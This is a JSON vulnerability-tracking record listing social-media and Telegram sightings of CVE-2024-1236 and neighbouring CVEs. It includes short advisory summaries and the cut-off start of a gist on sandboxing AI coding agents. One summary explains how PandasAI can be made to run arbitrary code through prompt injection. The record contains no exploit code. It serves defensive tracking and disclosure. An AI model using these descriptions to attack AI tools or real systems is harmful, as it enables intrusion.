{"vulnerability": "cve-2024-1236", "sightings": [{"uuid": "01e2dcd6-5814-4b33-a0e9-5a278695a42e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12360", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113621121483792762", "content": "", "creation_timestamp": "2024-12-09T05:05:26.596707Z"}, {"uuid": "571a8d9a-b11d-4f99-8bc0-2d394ebc527e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12369", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113624852492732843", "content": "", "creation_timestamp": "2024-12-09T20:54:16.963597Z"}, {"uuid": "b8069731-d2d4-4ef8-a582-e3d14336ea6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12363", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113633523015812139", "content": "", "creation_timestamp": "2024-12-11T09:39:18.786946Z"}, {"uuid": "221da85d-7884-4cf1-bb58-a35c2d6a95db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12365", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113825455604962375", "content": "", "creation_timestamp": "2025-01-14T07:10:21.191153Z"}, {"uuid": "86148048-80c7-4832-902d-37e9339470ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12365", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3lftcbcvgdh2m", "content": "", "creation_timestamp": "2025-01-16T03:04:48.760796Z"}, {"uuid": "20a18dfb-6829-4b82-bdf4-54dba20c6e98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12365", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lfopefu2gp2n", "content": "", "creation_timestamp": "2025-01-14T07:15:52.371762Z"}, {"uuid": "d6f23ea4-bf7e-4223-b0d9-68c56fca2eee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12365", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lfoqukgdir2h", "content": "", "creation_timestamp": "2025-01-14T07:42:47.898567Z"}, {"uuid": "7afa1095-ecfb-40dd-a228-e6c3d907549e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12365", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lfoquknkwz2h", "content": "", "creation_timestamp": "2025-01-14T07:42:48.907353Z"}, {"uuid": "dd97454c-5a03-4893-986c-8f9fb3ae458b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12365", "type": "seen", "source": "https://mastodon.social/users/CyberSignaler/statuses/113825605649943834", "content": "", "creation_timestamp": "2025-01-14T07:48:27.127411Z"}, {"uuid": "40029511-7877-49b4-9ae2-df69480df092", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12365", "type": "seen", "source": "https://bsky.app/profile/hackingne.ws/post/3lfv6rb3wys2y", "content": "", "creation_timestamp": "2025-01-16T21:07:28.053727Z"}, {"uuid": "72fff6b8-4a0d-408e-9bbc-e6a84aed0083", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-12365", "type": "seen", "source": "https://bsky.app/profile/kyosuke-tanaka.bsky.social/post/3lftvss2kp22q", "content": "", "creation_timestamp": "2025-01-16T08:54:36.610930Z"}, {"uuid": "21cf58da-2959-447b-9dd0-3d7c7bf7a321", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12365", "type": "seen", "source": "https://infosec.exchange/users/jbhall56/statuses/113844206824737894", "content": "", "creation_timestamp": "2025-01-17T14:38:58.391047Z"}, {"uuid": "294dfa66-b307-4ee5-aab5-dde0ee6f6548", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12365", "type": "seen", "source": "https://bsky.app/profile/jbhall56.bsky.social/post/3lfwzjtt6p22y", "content": "", "creation_timestamp": "2025-01-17T14:39:11.400998Z"}, {"uuid": "16d397c8-e6d8-40d0-9ab1-e983629bec96", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12365", "type": "seen", "source": "https://bsky.app/profile/bolhasec.com/post/3lfxtu4ytkx2y", "content": "", "creation_timestamp": "2025-01-17T22:30:13.656722Z"}, {"uuid": "7ae0080e-903d-4b96-a6b3-cf474c1d3291", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12365", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-19fd9414-f6e015e089aff22d", "content": "", "creation_timestamp": "2025-01-18T17:23:41.187341Z"}, {"uuid": "a60290fd-517e-43d1-89c2-a049ead8731f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12365", "type": "seen", "source": "https://bsky.app/profile/elhackernet.extwitter.link/post/3lg3kktvyms26", "content": "", "creation_timestamp": "2025-01-19T09:54:36.969897Z"}, {"uuid": "9b3b4c6b-c9ff-46bb-bb26-7536363c939b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-12365", "type": "seen", "source": "https://bsky.app/profile/kyosuke-tanaka.bsky.social/post/3lg5ceaqux22b", "content": "", "creation_timestamp": "2025-01-20T02:33:04.666934Z"}, {"uuid": "5eb043b2-d82f-43fe-af8b-de5e07e08217", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12365", "type": "seen", "source": "https://mstdn.ca/users/rfwaveio/statuses/113861697335696342", "content": "", "creation_timestamp": "2025-01-20T16:47:07.042848Z"}, {"uuid": "a7fdf1fb-98eb-4d3e-a6f8-4c5e2d5e57bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12366", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113985351114543788", "content": "", "creation_timestamp": "2025-02-11T12:53:49.414504Z"}, {"uuid": "3fec8e1b-7cf8-4041-9fa0-d1be0af90170", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12366", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lhvqjn3qkr23", "content": "", "creation_timestamp": "2025-02-11T13:15:43.144485Z"}, {"uuid": "e8689a18-fc63-48f3-8db1-419771af9acc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12366", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lhvu4qgspo2y", "content": "", "creation_timestamp": "2025-02-11T14:20:11.512221Z"}, {"uuid": "43902ec7-8b91-4ca3-be5b-374bcab5897d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12366", "type": "seen", "source": "https://bsky.app/profile/dinosn.bsky.social/post/3lhxbhshixk24", "content": "", "creation_timestamp": "2025-02-12T03:51:39.515915Z"}, {"uuid": "8e7d9587-373c-4e6f-9e57-5e5352cec1f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12366", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3li3i5vka7s26", "content": "", "creation_timestamp": "2025-02-13T20:01:58.784176Z"}, {"uuid": "c9fb2119-8503-4bc2-b9a9-bac9a3c41f37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12368", "type": "seen", "source": "https://mastodon.social/users/CyberSignaler/statuses/114066255003294911", "content": "", "creation_timestamp": "2025-02-25T19:48:45.022045Z"}, {"uuid": "feac696e-8302-487b-b515-a187c400462b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12364", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lsmfp62vqt2u", "content": "", "creation_timestamp": "2025-06-27T19:45:08.066695Z"}, {"uuid": "68d367e3-00c6-4598-8560-2cccb390055a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12366", "type": "seen", "source": "https://bsky.app/profile/bolhasec.com/post/3lpa24buegp2a", "content": "", "creation_timestamp": "2025-05-15T17:30:11.713272Z"}, {"uuid": "cd3277ee-a949-4f3e-9a7c-86d7c32e01b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12368", "type": "seen", "source": "MISP/24306fae-b16b-4478-9297-d2973cdb583c", "content": "", "creation_timestamp": "2025-08-22T14:52:23.000000Z"}, {"uuid": "e0543a1d-38e9-4145-a102-d23907b53b8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12367", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lyx2rw5qwx2o", "content": "", "creation_timestamp": "2025-09-16T10:00:15.823587Z"}, {"uuid": "4c4a7879-2fd2-44e5-8dab-b8b7f09c533b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12368", "type": "seen", "source": "https://t.me/cvedetector/18904", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-12368 - Odoo OAuth Token Export Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-12368 \nPublished : Feb. 25, 2025, 6:15 p.m. | 1\u00a0hour, 46\u00a0minutes ago \nDescription : Improper access control in the auth_oauth module of Odoo Community 15.0 and Odoo Enterprise 15.0 allows an internal user to export the OAuth tokens of other users. \nSeverity: 8.1 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"25 Feb 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-02-25T21:33:58.000000Z"}, {"uuid": "9d39356b-744a-4d6b-bd4b-48340848f42d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12366", "type": "seen", "source": "https://t.me/cvedetector/17706", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-12366 - PandasAI LLM Remote Code Execution Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-12366 \nPublished : Feb. 11, 2025, 1:15 p.m. | 52\u00a0minutes ago \nDescription : PandasAI uses an interactive prompt function that is vulnerable to prompt injection and run arbitrary Python code that can lead to Remote Code Execution (RCE) instead of the intended explanation of the natural language processing by the LLM. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"11 Feb 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-02-11T15:41:46.000000Z"}, {"uuid": "c68d798b-ea3d-49ba-b94f-0b2617d9962f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12365", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1463", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12365\n\ud83d\udd39 Description: The W3 Total Cache plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the is_w3tc_admin_page function in all versions up to, and including, 2.8.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to obtain the plugin's nonce value and perform unauthorized actions, resulting in information disclosure, service plan limits consumption as well as making web requests to arbitrary locations originating from the web application that can be used to query information from internal services, including instance metadata on cloud-based applications.\n\ud83d\udccf Published: 2025-01-14T07:05:40.307Z\n\ud83d\udccf Modified: 2025-01-14T07:05:40.307Z\n\ud83d\udd17 References:\n1. https://www.wordfence.com/threat-intel/vulnerabilities/id/196e629f-7c77-4bcb-8224-305a0108b630?source=cve\n2. https://plugins.trac.wordpress.org/browser/w3-total-cache/tags/2.8.0/w3-total-cache.php#L71\n3. https://plugins.trac.wordpress.org/browser/w3-total-cache/tags/2.8.0/Root_Loader.php#L269\n4. https://plugins.trac.wordpress.org/browser/w3-total-cache/tags/2.8.0/Generic_Plugin_Admin.php#L55\n5. https://plugins.trac.wordpress.org/browser/w3-total-cache/tags/2.8.0/Generic_Plugin_Admin.php#L385\n6. https://plugins.trac.wordpress.org/browser/w3-total-cache/tags/2.8.0/Generic_Plugin_Admin.php#L516\n7. https://plugins.trac.wordpress.org/browser/w3-total-cache/tags/2.8.0/Util_Admin.php#L822\n8. https://plugins.trac.wordpress.org/browser/w3-total-cache/tags/2.8.0/inc/options/common/top_nav_bar.php#L217\n9. https://plugins.trac.wordpress.org/browser/w3-total-cache/tags/2.8.0/inc/options/common/footer.php#L49\n10. https://plugins.trac.wordpress.org/browser/w3-total-cache/tags/2.8.0/Extensions_Plugin_Admin.php#L55\n11. https://plugins.trac.wordpress.org/browser/w3-total-cache/tags/2.8.0/Extensions_Plugin_Admin.php#L246\n12. https://plugins.trac.wordpress.org/browser/w3-total-cache/tags/2.8.0/Extension_ImageService_Plugin_Admin.php#L200\n13. https://plugins.trac.wordpress.org/browser/w3-total-cache/tags/2.8.0/UsageStatistics_Plugin_Admin.php#L10\n14. https://plugins.trac.wordpress.org/browser/w3-total-cache/tags/2.8.0/UsageStatistics_Plugin_Admin.php#L94", "creation_timestamp": "2025-01-14T08:08:18.000000Z"}, {"uuid": "92ba9539-ad54-4e89-8496-d15cd80c81ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12366", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3932", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12366\n\ud83d\udd25 CVSS Score: 9.8 (CVSS_V3)\n\ud83d\udd39 Description: PandasAI uses an interactive prompt function that is vulnerable to prompt injection and run arbitrary Python code that can lead to Remote Code Execution (RCE) instead of the intended explanation of the natural language processing by the LLM. The security controls of PandasAI (2.4.3 and earlier) fail to distinguish between legitimate and malicious inputs, allowing the attackers to manipulate the system into executing untrusted code, leading to untrusted code execution (RCE), system compromise, or pivoting attacks on connected services.\n\ud83d\udccf Published: 2025-02-11T15:32:24Z\n\ud83d\udccf Modified: 2025-02-11T21:41:47Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-12366\n2. https://docs.getpanda.ai/v3/privacy-security\n3. https://docs.pandas-ai.com/advanced-security-agent\n4. https://github.com/sinaptik-ai/pandas-ai\n5. https://www.kb.cert.org/vuls/id/148244", "creation_timestamp": "2025-02-11T22:06:55.000000Z"}, {"uuid": "b41c5ffb-ee7a-4ea3-b0ac-2ec6a49664f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12368", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/5340", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12368\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: Improper access control in the auth_oauth module of Odoo Community 15.0 and Odoo Enterprise 15.0 allows an internal user to export the OAuth tokens of other users.\n\ud83d\udccf Published: 2025-02-25T18:10:12.109Z\n\ud83d\udccf Modified: 2025-02-25T18:10:12.109Z\n\ud83d\udd17 References:\n1. https://github.com/odoo/odoo/issues/193854", "creation_timestamp": "2025-02-25T18:22:34.000000Z"}, {"uuid": "a2405220-b967-4f58-a5ec-736da33538c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12369", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12325", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12369\n\ud83d\udd25 CVSS Score: 4.2 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N)\n\ud83d\udd39 Description: A vulnerability was found in OIDC-Client. When using the RH SSO OIDC adapter with EAP 7.x or when using the elytron-oidc-client subsystem with EAP 8.x, authorization code injection attacks can occur, allowing an attacker to inject a stolen authorization code into the attacker's own session with the client with a victim's identity. This is usually done with a Man-in-the-Middle (MitM) or phishing attack.\n\ud83d\udccf Published: 2024-12-09T20:53:09.260Z\n\ud83d\udccf Modified: 2025-04-17T18:46:48.744Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:3989\n2. https://access.redhat.com/security/cve/CVE-2024-12369\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2331178", "creation_timestamp": "2025-04-17T18:58:08.000000Z"}, {"uuid": "72b24f6f-de22-4491-8817-386375b805e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12364", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19747", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12364\n\ud83d\udd25 CVSS Score: 9.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Mavi Ye\u015fil Software Guest Tracking Software allows SQL Injection.This issue affects .\u00a0\u00a0NOTE: The vendor did not inform about the completion of the fixing process within the specified time. The CVE will be updated when new information becomes available.\n\ud83d\udccf Published: 2025-06-27T16:13:51.955Z\n\ud83d\udccf Modified: 2025-06-27T16:40:30.349Z\n\ud83d\udd17 References:\n1. https://www.usom.gov.tr/bildirim/tr-25-0140", "creation_timestamp": "2025-06-27T16:57:26.000000Z"}, {"uuid": "c7642edf-1fb2-4a29-90f2-b488363c846b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12365", "type": "seen", "source": "https://t.me/cvedetector/15232", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-12365 - WordPress W3 Total Cache Unauthorized Data Access Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-12365 \nPublished : Jan. 14, 2025, 7:15 a.m. | 38\u00a0minutes ago \nDescription : The W3 Total Cache plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the is_w3tc_admin_page function in all versions up to, and including, 2.8.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to obtain the plugin's nonce value and perform unauthorized actions, resulting in information disclosure, service plan limits consumption as well as making web requests to arbitrary locations originating from the web application that can be used to query information from internal services, including instance metadata on cloud-based applications. \nSeverity: 8.5 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"14 Jan 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-01-14T08:58:24.000000Z"}, {"uuid": "305da1b8-6943-4bb6-954e-fea891c92031", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12369", "type": "seen", "source": "https://t.me/cvedetector/12447", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-12369 - OpenID Connect Client Authorization Code Injection Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-12369 \nPublished : Dec. 9, 2024, 9:15 p.m. | 37\u00a0minutes ago \nDescription : A vulnerability was found in OIDC-Client. When using the RH SSO OIDC adapter with EAP 7.x or when using the elytron-oidc-client subsystem with EAP 8.x, authorization code injection attacks can occur, allowing an attacker to inject a stolen authorization code into the attacker's own session with the client with a victim's identity. This is usually done with a Man-in-the-Middle (MitM) or phishing attack. \nSeverity: 4.2 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"09 Dec 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-09T23:04:27.000000Z"}, {"uuid": "5376231b-5a53-489a-a356-b95f1d1472b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12360", "type": "seen", "source": "https://t.me/cvedetector/12362", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-12360 - \"Code-projects Online Class and Exam Scheduling System SQL Injection Vulnerability\"\", \n  \"Content\": \"CVE ID : CVE-2024-12360 \nPublished : Dec. 9, 2024, 5:15 a.m. | 38\u00a0minutes ago \nDescription : A vulnerability was found in code-projects Online Class and Exam Scheduling System 1.0. It has been rated as critical. This issue affects some unknown processing of the file class_update.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. \nSeverity: 6.3 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"09 Dec 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-09T07:10:07.000000Z"}, {"uuid": "23c778ff-668c-4a1f-b9ab-89ece3276758", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12362", "type": "seen", "source": "https://t.me/cvedetector/12978", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-12362 - InvoicePlane Path Traversal Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-12362 \nPublished : Dec. 16, 2024, 10:15 a.m. | 41\u00a0minutes ago \nDescription : A vulnerability was found in InvoicePlane up to 1.6.1. It has been classified as problematic. This affects the function download of the file invoices.php. The manipulation of the argument invoice leads to path traversal. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.6.2-beta-1 is able to address this issue. It is recommended to upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product. \nSeverity: 4.3 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"16 Dec 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-16T12:19:30.000000Z"}, {"uuid": "798f8c38-946a-466a-837b-e3ad98be4b95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12363", "type": "seen", "source": "https://t.me/cvedetector/12624", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-12363 - TeamViewer Remote Management Local File Deletion Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-12363 \nPublished : Dec. 11, 2024, 10:15 a.m. | 59\u00a0minutes ago \nDescription : Insufficient permissions in the TeamViewer Patch &amp; Asset Management component prior to version 24.12 on Windows allows a local authenticated user to delete arbitrary files.\u00a0TeamViewer Patch &amp; Asset Management is part of TeamViewer Remote Management. \nSeverity: 7.1 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"11 Dec 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-11T12:43:52.000000Z"}, {"uuid": "6e9e879c-4fbd-4fa6-bed5-e6ce0809d5f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12366", "type": "seen", "source": "Telegram/03ProG_aSsOBxs0Iz_mqpSONf1h0Bjc41e6bDcTiczX4atpv", "content": "", "creation_timestamp": "2025-02-14T10:01:40.000000Z"}, {"uuid": "e8521c8d-159f-40f3-8d8c-cca59513f2df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12366", "type": "seen", "source": "Telegram/MDn3J-gZI7WnMy5prxbmMSmCuuwX13pC8UWTypDqOGxF42G_", "content": "", "creation_timestamp": "2025-02-14T10:01:40.000000Z"}, {"uuid": "f5658378-e578-4847-b329-5722c8f5059b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12366", "type": "seen", "source": "Telegram/eHEjQCiSTDqdk9YFMewvBbbqxj24kA_-fNM16rcTTHsyl0hG", "content": "", "creation_timestamp": "2025-02-14T10:04:00.000000Z"}, {"uuid": "f0dc49d4-e8a3-4124-b59b-26f9a4925959", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1236", "type": "seen", "source": "https://t.me/ctinow/203687", "content": "https://ift.tt/nRfeGjt\nCVE-2024-1236 | wpdevteam Essential Addons for Elementor Plugin up to 5.9.8 on WordPress cross site scripting (ID 3034127)", "creation_timestamp": "2024-03-09T00:31:59.000000Z"}, {"uuid": "1e147309-d395-41b0-b54e-15db494294f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12366", "type": "seen", "source": "https://gist.github.com/Sagar2366/6b01a07e54bbccfeb747b6ee441b17f4", "content": "# Secure AI Coding Agents with Docker Sandboxes\n\n&gt; By Sagar Utekar \u2014 Docker Captain | Senior SRE, CrowdStrike | CNCF Ambassador\n\n---\n\n## Why This Matters\n\n- 25% of production code is now AI-authored\n- Developers using agents merge 60% more PRs\n- Agents run with YOUR credentials, filesystem, and network access\n- Your laptop is the new prod \u2014 with zero security boundaries\n\n**This isn't hypothetical.** NVIDIA's AI red team published CVE-2024-12366 \u2014 a documented case of AI-generated code escalating into remote code execution when there's no proper isolation. Two security tools (Trivy, KICS) were supply-chain-compromised in Q1 2026 via stolen credentials.\n\nThe tradeoff AI agents have imposed: limit access and the agent becomes not-so-autonomous. Give full access and it's a security nightmare. Docker Sandboxes breaks that compromise \u2014 full autonomy inside hard boundaries.\n\n---\n\n## What Are Docker Sandboxes?\n\nGive your AI agent its own **burner laptop**. It can install whatever it wants, spin up containers, do 